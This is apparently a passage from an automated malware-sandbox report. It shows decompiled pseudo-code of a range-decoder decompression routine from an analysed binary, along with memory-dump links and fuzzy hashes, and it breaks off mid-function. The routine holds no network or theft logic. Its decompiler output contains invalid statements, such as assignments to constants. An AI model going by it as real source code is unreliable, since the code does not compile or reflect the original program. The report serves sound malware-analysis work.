                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                • Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
                                                • Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                                • Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406F5B() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
